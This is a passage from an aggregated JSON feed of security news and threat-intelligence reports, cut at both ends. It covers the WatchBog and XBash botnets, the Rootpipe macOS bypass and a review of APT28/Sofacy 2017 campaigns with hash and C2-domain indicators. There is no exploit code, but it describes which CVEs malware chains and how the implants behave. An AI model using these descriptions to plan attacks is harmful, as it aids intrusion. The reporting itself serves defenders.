attacker-controlled servers. \n\n\n[](<https://thehackernews.com/images/-vcIC_sHLKcs/XTly86EzVVI/AAAAAAAA0jU/AfdazQ8l2pk3kRCqjySyk2GL3XW7075NQCLcBGAs/s728-e100/BlueKeep-RDP-vulnerability-exploit.png>)\n\nAccording to the researcher, the new WatchBog variant has already compromised more than 4,500 Linux machines in the last two months. \n \nAlthough WatchBog is operating since late last year, attackers are distributing its new variant in an ongoing campaign active since early June this year. \n \nThe newly-discovered WatchBog variant includes a new spreading module along with exploits for some recently patched vulnerabilities in Linux applications, allowing attackers to find and compromise more Linux systems rapidly. \n \nThe WatchBog Linux botnet malware contains several modules, as structurally briefed below, which leverages recently patched vulnerabilities in Exim, Jira, Solr, Jenkins, ThinkPHP and Nexus applications to compromise Linux machines. \n \n**Pwn Module** \n \n\n\n * CVE-2019-11581 (Jira)\n * CVE-2019-10149 (Exim)\n * CVE-2019-0192 (Solr)\n * CVE-2018-1000861 (Jenkins)\n * CVE-2019-7238 (Nexus Repository Manager 3)\n \n**Scanning Module** \n \n\n\n * BlueKeep Scanner\n * Jira Scanner\n * Solr Scanner\n \n**Brute-forcing Module** \n \n\n\n * CouchDB instances\n * Redis instances\n \n**Spreading Module** \n \n\n\n * Apache ActiveMQ (CVE-2016-3088)\n * Solr (CVE-2019-0192)\n * Code Execution over Redis\n \nAfter scanning and brute-forcing modules discover a Linux machine running the vulnerable application, WatchBog deploys a script on the targeted machine to download Monero miner modules from Pastebin website. \n \nThe malicious script then also gains persistence on the infected system via crontab and further downloads a new spreader module, which comes in the form of a dynamically linked Cython-compiled ELF executable. \n \nResearchers have recommended Linux and Windows administrators to keep their software and operating systems up-to-date against known vulnerabilities in order to prevent themselves from being a victim of such attack campaigns. \n \nYou can find if WatchBog has infected your Linux machine by checking the existence of the \"/tmp/.tmplassstgggzzzqpppppp12233333\" file or the \"/tmp/.gooobb\" file on your system.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-25T09:38:00", "type": "thn", "title": "Linux Botnet Adding BlueKeep-Flawed Windows RDP Servers to Its Target List", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088", "CVE-2018-1000861", "CVE-2019-0192", "CVE-2019-10149", "CVE-2019-11581", "CVE-2019-7238"], "modified": "2019-07-25T11:08:32", "id": "THN:66694DD5D9C12B2B7881AB6C960E34DC", "href": "https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-ygWTdRbnRzg/W6JjJNYdGkI/AAAAAAAAyKs/X2RZmectQkccC3bodz1NnV9uBrk228m-gCLcBGAs/s728-e100/ransomware-coin-mining-botnet-hacking-malware.jpg>)\n\nWindows and Linux users need to beware, as an all-in-one, destructive malware strain has been discovered in the wild that features multiple malware capabilities including ransomware, cryptocurrency miner, botnet, and self-propagating worm targeting Linux and Windows systems. \n \nDubbed XBash, the new malware, believed to be tied to the Iron Group, a.k.a. Rocke\u2014the Chinese speaking APT threat actors group known for previous cyber attacks involving [ransomware](<https://thehackernews.com/2018/07/samsam-ransomware-attacks.html>) and [cryptocurrency miners](<https://thehackernews.com/2017/11/cryptocurrency-mining-javascript.html>). \n \nAccording to the researchers from security vendor Palo Alto Networks, who [uncovered](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/>) the malware, XBash is an all-in-one malware that features ransomware and cryptocurrency mining capabilities, as well as worm-like ability similar to [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) or Petya/[NotPetya](<https://thehackernews.com/2017/10/ukraine-notpetya-cyberattack.html>). \n \nIn addition to self-propagating capabilities, XBash also contains a functionality, which is not yet implemented, that could allow the malware to spread quickly within an organization's network. \n \nDeveloped in Python, XBash hunts for vulnerable or unprotected web services and deletes databases such as MySQL, PostgreSQL, and [MongoDB](<https://thehackernews.com/2017/01/secure-mongodb-database.html>) running on Linux servers, as part of its ransomware capabilities. \n \n\n\n## Important: Paying Ransom Will Get You Nothing!\n\n \nXbash has been designed to scan for services on a target IP, on both TCP and UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. \n \nOnce find an open port, the malware uses a weak username and password dictionary attack to brute force itself into the vulnerable service, and once in, deletes all the databases and then displays the ransom note. \n \nWhat's worrisome is that the malware itself does not contain any functionality that would allow the recovery of the deleted databases once a ransom amount has been paid by the victims. \n \nTo date, XBash has infected at least 48 victims, who have already paid the ransom, making about $6,000 to date for cybercriminals behind the threat. However, researchers see no evidence that the paid payments have resulted in the recovery of data for the victims. \n \nThe malware also has capabilities to add targeted Linux-based systems in a botnet. \n \n\n\n## XBash Malware Exploits Flaws in Hadoop, Redis, and ActiveMQ\n\n \nOn the other hand, XBash targets Microsoft Windows machines only for cryptocurrency mining and self-propagation. For self-propagation, it exploits three known vulnerabilities in Hadoop, Redis, and ActiveMQ: \n \n \n\n\n * Hadoop YARN ResourceManager unauthenticated command execution bug disclosed in October 2016 and has no CVE number assigned.\n * Redis arbitrary file writes, and remote command execution vulnerability disclosed in October 2015 with no CVE number assigned.\n * ActiveMQ arbitrary file write vulnerability (CVE-2016-3088), disclosed in earlier 2016.\n \n \nIf the entry point is a vulnerable Redis service, Xbash will send malicious JavaScript or VBScript payload for downloading and executing a [coinminer for Windows](<https://thehackernews.com/2018/03/cryptocurrency-mining-malware.html>) instead of its botnet and ransomware module. \n \nAs mentioned above, Xbash is developed in Python and then was converted to Portable Executable (PE) using PyInstaller, which can create binaries for multiple platforms, including Windows, Apple macOS, and Linux, and also provides anti-detection. \n \nThis, in turn, enables XBash to be truly [cross-platform malware](<https://thehackernews.com/2017/07/adwind-rat-malware.html>), though, at the time of writing, researchers found samples only for Linux and did not see any Windows or macOS versions of Xbash. \n \nUsers can protect themselves against XBash by following basic cybersecurity practices, including: \n \n\n\n * change default login credentials on your systems,\n * use strong and unique passwords,\n * keep your operating system and software up-to-date,\n * avoid downloading and running untrusted files or clicking links,\n * take backup of their data regularly, and\n * prevent unauthorized connection using a firewall.\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-19T15:32:00", "type": "thn", "title": "New Malware Combines Ransomware, Coin Mining and Botnet Features in One", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2018-09-19T15:32:57", "id": "THN:E2ECFA2AA521F10B7A62A00D2F722C90", "href": "https://thehackernews.com/2018/09/ransomware-coinmining-botnet.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-27T10:06:49", "description": "[](<https://1.bp.blogspot.com/-KsHO5bnbexQ/VTYmA7yvE9I/AAAAAAAAipQ/RIcQv54Ke0U/s1600/rootpipe-mac-os-x-vulnerability.jpg>)\n\nSad but True! Your Apple\u2019s Mac computer is vulnerable to a serious privilege escalation flaw, dubbed \"RootPipe,\" even if you are running the latest version of Mac OS X.\n\n \n\n\n**What\u2019s RootPipe?**\n\n \n\n\nBack in October 2014, a Swedish White Hat hacker _Emil Kvarnhammar_ claimed to have [discovered](<http://www.macworld.co.uk/news/mac-software/swedish-hacker-finds-serious-vulnerability-in-os-x-yosemite-3583723/>) a critical privilege escalation vulnerability, he dubbed the backdoor as \"_RootPipe_,\" in some versions of Mac OS X including the then newest version 10.10 Yosemite.\n\n \n\n\nThe vulnerability (_CVE-2015-1130_) could allow an attacker to take full control of your desktop Mac computer or MacBook laptop, even without any authentication.\n\n \n\n\nKeeping in mind the devastating effect of the RootPipe vulnerability, the researcher privately reported the flaw to Apple and did not disclose the details of the flaw publicly until the company released a patch to fix it.\n\n \n\n\n**Apple did release an update but failed to patch RootPipe:**\n\n \n\n\nEarlier this month, Apple released the latest version of Mac OS X Yosemite, i.e. OS X Yosemite 10.10.3, and claimed to have fixed the so-called Rootpipe backdoor, which had been residing on Mac computers since 2011.\n\n \n\n\nHowever, the company did not fix the flaw in the older versions (below 10.10) of the operating system due to uncodified Apple policy on patching, leaving tens of millions of Mac users at risk.\n\n> \"_Apple indicated that this issue required a substantial amount of changes on their side and that they would not backport the fix to 10.9.x and older_,\" Kvarnhammar said in a [blog post](<https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/>) on the TrueSec website.\n\n**But here\u2019s the worse part:**\n\n \n\n\nApple\u2019s RootPipe vulnerability patch for Mac OS X Yosemite 10.10.3 is [claimed](<https://www.forbes.com/sites/thomasbrewster/2015/04/19/apple-fails-to-patch-rootpipe/>) to be itself vulnerable, which again left all the Mac machines vulnerable to the RootPipe attacks.\n\n \n\n\nHoly Crap!\n\n \n\n\nPatrick Wardle, an ex-NSA staffer and current director of R&D at Synack, claimed to have discovered\u2026\n\n \n\n\n...a new way around Apple's security fix to reabuse the Rootpipe vulnerability, again opening path to the highest privilege level \u2013 root access.\n\n \n\n\nThough this time, the attack requires a hacker to have gained local privileges, which could most likely be obtained via a working exploit of other software sitting on Mac machines.\n\n \n\n\n**Here\u2019s the Video Demonstration:**\n\n \n\n\nWardle has demonstrated his hack attack in action in a video proof-of-concept (POC), which you can watch below:\n\n \n\n\nWardle has already reported his findings to the Apple\u2019s security team and would [not disclose](<https://objective-see.com/blog.html>) the details of his attack code public before the company will not issue a complete and unbreakable fix.\n\n \n\n\nNow, let's just hope to get a tough fix for Rootpipe backdoor this time from Apple. Last time the company took nearly six months to release a patch that was fooled by Wardle sitting on a flight.\n", "cvss3": {}, "published": "2015-04-20T23:31:00", "type": "thn", "title": "Apple Failed to Patch Rootpipe Mac OS X Yosemite Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-1130"], "modified": "2015-04-21T10:31:24", "id": "THN:AC9FE9EB5F1C5B026F0BCF1D4D883160", "href": "https://thehackernews.com/2015/04/rootpipe-mac-os-x-vulnerability.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-03-07T22:51:46", "description": "\n\nSofacy, also known as APT28, Fancy Bear, and Tsar Team, is a highly active and prolific [APT](<https://securelist.com/threats/apt-advanced-persistent-threats-glossary?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). From their high volume 0day deployment to their innovative and broad malware set, Sofacy is one of the top groups that we monitor, report, and protect against. 2017 was not any different in this regard. Our private reports subscription customers receive a steady stream of [YARA](<https://securelist.com/threats/yara-glossary?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), IOC, and reports on Sofacy, our most reported APT for the year.\n\nThis high level of cyber-espionage activity goes back years. In 2011-2012, the group used a relatively tiny implant (known as \"Sofacy\" or SOURFACE) as their first stage malware, which at the time had similarities with the old Miniduke implants. This made us believe the two groups were connected, although it looks they split ways at a certain point, with the original Miniduke group switching to the CosmicDuke implant in 2014. The division in malware was consistent and definitive at that point.\n\nIn 2013, the Sofacy group expanded their arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across 4-5 generations) and a few others. We've seen quite a few versions of these implants, which were relatively widespread at some point or still are. In 2015 we noticed [another wave of attacks](<https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/>) which took advantage of a new release of the AZZY implant, largely undetected by antivirus products. The new wave of attacks included a new generation of USB stealers deployed by Sofacy, with initial versions dating to February 2015. It appeared to be geared exclusively towards high profile targets.\n\nSofacy's reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group's activities in 2016, especially when data from the compromise was leaked and \"weaponized\". And later 2016, their focus turned towards the Olympics' and the World Anti-Doping Agency (WADA) and Court of Arbitration for Sports (CAS), when individuals and servers in these organizations were phished and compromised. In a similar vein with past CyberBerkut activity, attackers hid behind anonymous activist groups like \"anonpoland\", and data from victimized organizations were similarly leaked and \"weaponized\".\n\nThis write-up will survey notables in the past year of 2017 Sofacy activity, including their targeting, technology, and notes on their infrastructure. No one research group has 100% global visibility, and our collected data is presented accordingly. Here, external APT28 reports on 2017 [Darkhotel](<https://securelist.com/the-darkhotel-apt/66779/>)-style activity [in Europe](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) and [Dealer's Choice](<https://researchcenter.paloaltonetworks.com/2016/12/unit42-let-ride-sofacy-groups-dealerschoice-attacks-continue/>) spearphishing are of interest. From where we sit, 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners, coinciding with lighter interest in Central Asian targets, and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East.\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163041/180220-sofacy-review-1.png>)\n\n## **Dealer's Choice**\n\nThe beginning of 2017 began with a slow cleanup following the Dealer's Choice campaign, with technical characteristics documented by our colleagues at Palo Alto in several stages at the end of 2016. The group spearphished targets in several waves with Flash exploits leading to their carberp based JHUHUGIT downloaders and further stages of malware. It seems that many folks did not log in and pull down their emails until Jan 2017 to retrieve the Dealer's Choice spearphish. Throughout these waves, we observed that the targets provided connection, even tangential, to Ukraine and NATO military and diplomatic interests.\n\nIn multiple cases, Sofacy spoofs the identity of a target, and emails a spearphish to other targets of interest. Often these are military or military-technology and manufacturing related, and here, the DealersChoice spearphish is again NATO related:\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163036/180220-sofacy-review-2.png>)\n\nThe global reach that coincided with this focus on NATO and the Ukraine couldn't be overstated. Our KSN data showed spearphishing targets geolocated across the globe into 2017. \nAM, AZ, FR, DE, IQ, IT, KG, MA, CH, UA, US, VN\n\nDealersChoice emails, like the one above, that we were able to recover from third party sources provided additional targeting insight, and confirmed some of the targeting within our KSN data: \nTR, PL, BA, AZ, KR, LV, GE, LV, AU, SE, BE\n\n## **0day Deployment(s)**\n\nSofacy kicked off the year deploying two 0day in a spearphish document, both a Microsoft Office encapsulated postscript type confusion exploit (abusing [CVE-2017-0262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0262>)) and an escalation of privilege use-after-free exploit (abusing [CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)). The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017. They took advantage of the Syrian military conflict for thematic content and file naming \"Trump's_Attack_on_Syria_English.docx\". Again, this deployment was likely a part of their focus on NATO targets.\n\n## **Light SPLM deployment in Central Asia and Consistent Infrastructure**\n\nMeanwhile in early-to-mid 2017, SPLM/CHOPSTICK/XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia. These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer, keylogger, and remoteshell functionality to a system of interest. As the latest revision of the backdoor, portions of SPLM didn't match previous reports on SPLM/XAgent while other similarities were maintained. SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year. Targeting profiles included defense related commercial and military organizations, and telecommunications.\n\nTargeting included TR, KZ, AM, KG, JO, UK, UZ\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163030/180220-sofacy-review-3.png>)\n\n## **Heavy Zebrocy deployments**\n\nSince mid-November 2015, the threat actor referred to as \"Sofacy\" or \"APT28\" has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIT. We collectively refer to this package and related activity as \"Zebrocy\" and had written a few reports on its usage and development by June 2017 - Sofacy developers modified and redeployed incremented versions of the malware. The Zebrocy chain follows a pattern: spearphish attachment -> compiled Autoit script (downloader) -> Zebrocy payload. In some deployments, we observed Sofacy actively developing and deploying a new package to a much smaller, specific subset of targets within the broader set.\n\nTargeting profiles, spearphish filenames, and lures carry thematic content related to visa applications and scanned images, border control administration, and various administrative notes. Targeting appears to be widely spread across the Middle East, Europe, and Asia:</p style=\"margin-bottom:0!important\">\n\n * Business accounting practices and standards\n * Science and engineering centers\n * Industrial and hydrochemical engineering and standards/certification\n * Ministry of foreign affairs\n * Embassies and consulates\n * National security and intelligence agencies\n * Press services\n * Translation services\n * NGO - family and social service\n * Ministry of energy and industry\n\nWe identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. The components were an unexpected inclusion in this particular toolset. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files 60mb and less with these extensions:</p style=\"margin-bottom:0!important\">\n\n * .doc\n * .docx\n * .xls\n * .xlsx\n * .ppt\n * .pptx\n * .exe\n * .zip\n * .rar\n\nAt execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its \"RecordToFile\" file stealer method.\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163025/180220-sofacy-review-4.png>)\n\nZebrocy spearphishing targets: \nAF, AM, AU, AZ, BD, BE, CN, DE, ES, FI, GE, IL, IN, JO, KW, KG, KZ, LB, LT, MN, MY, NL, OM, PK, PO, SA, ZA, SK, SE, CH, TJ, TM, TR, UA, UAE, UK, US, UZ\n\n## **SPLM deployment in Central Asia**\n\nSPLM/CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications, mostly deployed in the second half of 2017 by Sofacy. Earlier SPLM activity deployed 32-bit modules over unencrypted http (and sometimes smtp) sessions. In 2016 we saw fully functional, very large SPLM/X-Agent modules supporting OS X.\n\nThe executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels, maintaining slightly morphed encryption and functionality per deployment. Sofacy selectively used SPLM/CHOPSTICK modules as second stage implants to high interest targets for years now. In a change from previous compilations, the module was structured and used to inject remote shell, keylogger, and filesystem add-ons into processes running on victim systems and maintaining functionality that was originally present within the main module.\n\nThe newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form. These targets include foreign affairs government organizations both localized and abroad, and defense organizations' presence localized, located in Europe and also located in Afghanistan. One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina.\n\nMinor changes and updates to the code were released with these deployments, including a new mutex format and the exclusive use of encrypted HTTP communications over TLS. The compiled code itself already is altered per deployment in multiple subtle ways, in order to stymie identification and automated analysis and accommodate targeted environments. Strings (c2 domains and functionality, error messages, etc) are custom encrypted per deployment.\n\nTargets: TR, KZ, BA, TM, AF, DE, LT, NL\n\n## **SPLM/CHOPSTICK/XAgent Modularity and Infrastructure**\n\nThis subset of SPLM/CHOPSTICK activity leads into several small surprises that take us into 2018, to be discussed in further detail at SAS 2018. The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality, but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues. Changes in the second stage SPLM backdoor are refined, making the code reliably modular.\n\n## **Infrastructure Notes**\n\nSofacy set up and maintained multiple servers and c2 for varying durations, registering fairly recognizable domains with privacy services, registrars that accept bitcoin, fake phone numbers, phony individual names, and 1 to 1 email address to domain registration relationships. Some of this activity and patterns were publicly disclosed, so we expect to see more change in their process in 2018. Also, throughout the year and in previous years, researchers began to comment publicly on Sofacy's fairly consistent infrastructure setup.\n\nAs always, attackers make mistakes and give away hints about what providers and registrars they prefer. It's interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS. As an example, we might see extraneous data in their SSL/TLS certificates that give away information about their provider or resources. Leading up to summer 2017, infrastructure mostly was created with PDR and Internet Domain Service BS Corp, and their resellers. Hosting mostly was provided at Fast Serv Inc and resellers, in all likelihood related to bitcoin payment processing.\n\nAccordingly, the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing. One certificate was generated locally on what appeared to be a HP-UX box, and another was generated on \"8569985.securefastserver[.]com\" with an email address \"root@8569985.securefastserver[.]com\", as seen here for their nethostnet[.]com domain. This certificate configuration is ignored by the malware.\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163021/180220-sofacy-review-5.png>)\n\nIn addition to other ip data, this data point suggested that Qhoster at https://www.qhoster[.]com was a VPS hosting reseller of choice at the time. It should be noted that the reseller accepted Alfa Click, PayPal, Payza, Neteller, Skrill, WebMoney, Perfect Money, Bitcoin, Litecoin, SolidTrust Pay, CashU, Ukash, OKPAY, EgoPay, paysafecard, Alipay, MG, Western Union, SOFORT Banking, QIWI, Bank transfer for payment.\n\n## **Conclusion**\n\nSofacy, one of the most active APT we monitor, continues to spearphish their way into targets, reportedly widely phishes for credentials, and infrequently participates in server side activity (including host compromise with [BeEF deployment](<https://www.youtube.com/watch?v=yQ0zZ6Anb64&feature=youtu.be>), for example). KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia, and finally moving their focus further east into late 2017. Their operational security is good. Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH, Zebrocy, and SPLM, to name a few. Their evolving and modified SPLM/CHOPSTICK/XAgent code is a long-standing part of Sofacy activity, however much of it is changing. We'll cover more recent 2018 change in their targeting and the malware itself at [SAS 2018](<https://sas.kaspersky.com/>).\n\nWith a group like Sofacy, once their attention is detected on a network, it is important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two factor authentication for services like email and vpn access. In order to identify their presence, not only can you gain valuable insight into their targeting from intelligence reports and gain powerful means of detections with hunting tools like YARA, but out-of-band processing with a solution like KATA is important.\n\n## **Technical Appendix**\n\n### **Related md5**\n\n8f9f697aa6697acee70336f66f295837 \n1a4b9a6b321da199aa6d10180e889313 \n842454b48f5f800029946b1555fba7fc \nd4a5d44184333442f5015699c2b8af28 \n1421419d1be31f1f9ea60e8ed87277db \nb1d1a2c64474d2f6e7a5db71ccbafa31 \n953c7321c4959655fdd53302550ce02d \n57601d717fcf358220340675f8d63c8a \n02b79c468c38c4312429a499fa4f6c81 \n85cd38f9e2c9397a18013a8921841a04 \nf8e92d8b5488ea76c40601c8f1a08790 \n66b4fb539806ce27be184b6735584339 \ne8e1fcf757fe06be13bead43eaa1338c \n953c7321c4959655fdd53302550ce02d \naa2aac4606405d61c7e53140d35d7671 \n85cd38f9e2c9397a18013a8921841a04 \n57601d717fcf358220340675f8d63c8a \n16e1ca26bc66e30bfa52f8a08846613d \nf8e92d8b5488ea76c40601c8f1a08790 \nb137c809e3bf11f2f5d867a6f4215f95 \n237e6dcbc6af50ef5f5211818522c463 \n88009adca35560810ec220544e4fb6aa \n2163a33330ae5786d3e984db09b2d9d2 \n02b79c468c38c4312429a499fa4f6c81 \n842454b48f5f800029946b1555fba7fc \nd4a5d44184333442f5015699c2b8af28 \nb88633376fbb144971dcb503f72fd192 \n8f9f697aa6697acee70336f66f295837 \nb6f77273cbde76896a36e32b0c0540e1 \n1a4b9a6b321da199aa6d10180e889313 \n1421419d1be31f1f9ea60e8ed87277db \n1a4b9a6b321da199aa6d10180e889313 \n9b10685b774a783eabfecdb6119a8aa3 \naa34fb2e5849bff4144a1c98a8158970 \naced5525ba0d4f44ffd01c4db2730a34 \nb1d1a2c64474d2f6e7a5db71ccbafa31 \nb924ff83d9120d934bb49a7a2e3c4292 \ncdb58c2999eeda58a9d0c70f910d1195 \nd4a5d44184333442f5015699c2b8af28 \nd6f2bf2066e053e58fe8bcd39cb2e9ad \n34dc9a69f33ba93e631cd5048d9f2624 \n1c6f8eba504f2f429abf362626545c79 \n139c9ac0776804714ebe8b8d35a04641 \ne228cd74103dc069663bb87d4f22d7d5 \nbed5bc0a8aae2662ea5d2484f80c1760 \n8c3f5f1fff999bc783062dd50357be79 \n5882a8dd4446abd137c05d2451b85fea \n296c956fe429cedd1b64b78e66797122 \n82f06d7157dd28a75f1fbb47728aea25 \n9a975e0ddd32c0deef1318c485358b20 \n529424eae07677834a770aaa431e6c54 \n4cafde8fa7d9e67194d4edd4f2adb92b \nf6b2ef4daf1b78802548d3e6d4de7ba7 \nede5d82bb6775a9b1659dccb699fadcb \n116d2fc1665ce7524826a624be0ded1c \n20ff290b8393f006eaf4358f09f13e99 \n4b02dfdfd44df3c88b0ca8c2327843a4 \nc789ec7537e300411d523aef74407a5e \n0b32e65caf653d77cab2a866ee2d9dbc \n27faa10d1bec1a25f66e88645c695016 \n647edddf61954822ddb7ab3341f9a6c5 \n2f04b8eb993ca4a3d98607824a10acfb \n9fe3a0fb3304d749aeed2c3e2e5787eb \n62deab0e5d61d6bf9e0ba83d9e1d7e2b \n86b607fe63c76b3d808f84969cb1a781 \nf62182cf0ab94b3c97b0261547dfc6cf \n504182aaa5575bb38bf584839beb6d51 \nd79a21970cad03e22440ea66bd85931f\n\n### **Related domains**\n\nnethostnet[.]com \nhostsvcnet[.]com \netcrem[.]net \nmovieultimate[.]com \nnewfilmts[.]com \nfastdataexchange[.]org \nliveweatherview[.]com \nanalyticsbar[.]org \nanalyticstest[.]net \nlifeofmentalservice[.]com \nmeteost[.]com \nrighttopregnantpower[.]com \nkiteim[.]org \nadobe-flash-updates[.]org \ngeneralsecurityscan[.]com \nglobalresearching[.]org \nlvueton[.]com \naudiwheel[.]com \nonline-reggi[.]com \nfsportal[.]net \nnetcorpscanprotect[.]com \nmvband[.]net \nmvtband[.]net \nviters[.]org \ntreepastwillingmoment[.]com \nsendmevideo[.]org \nsatellitedeluxpanorama[.]com \nppcodecs[.]com \nencoder-info[.]tk \nwmdmediacodecs[.]com \npostlkwarn[.]com \nshcserv[.]com \nversiontask[.]com \nwebcdelivery[.]com \nmiropc[.]org \nsecurityprotectingcorp[.]com \nuniquecorpind[.]com \nappexsrv[.]net \nadobeupgradeflash[.]com", "cvss3": {}, "published": "2018-02-20T14:00:06", "type": "securelist", "title": "A Slice of 2017 Sofacy Activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0262", "CVE-2017-0263"], "modified": "2018-02-20T14:00:06", "id": "SECURELIST:F845B38B54D0C8C027B3C2728E64B367", "href": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, "[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>)," related to a Stairwell report, "[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>)." Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their "first seen" date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to 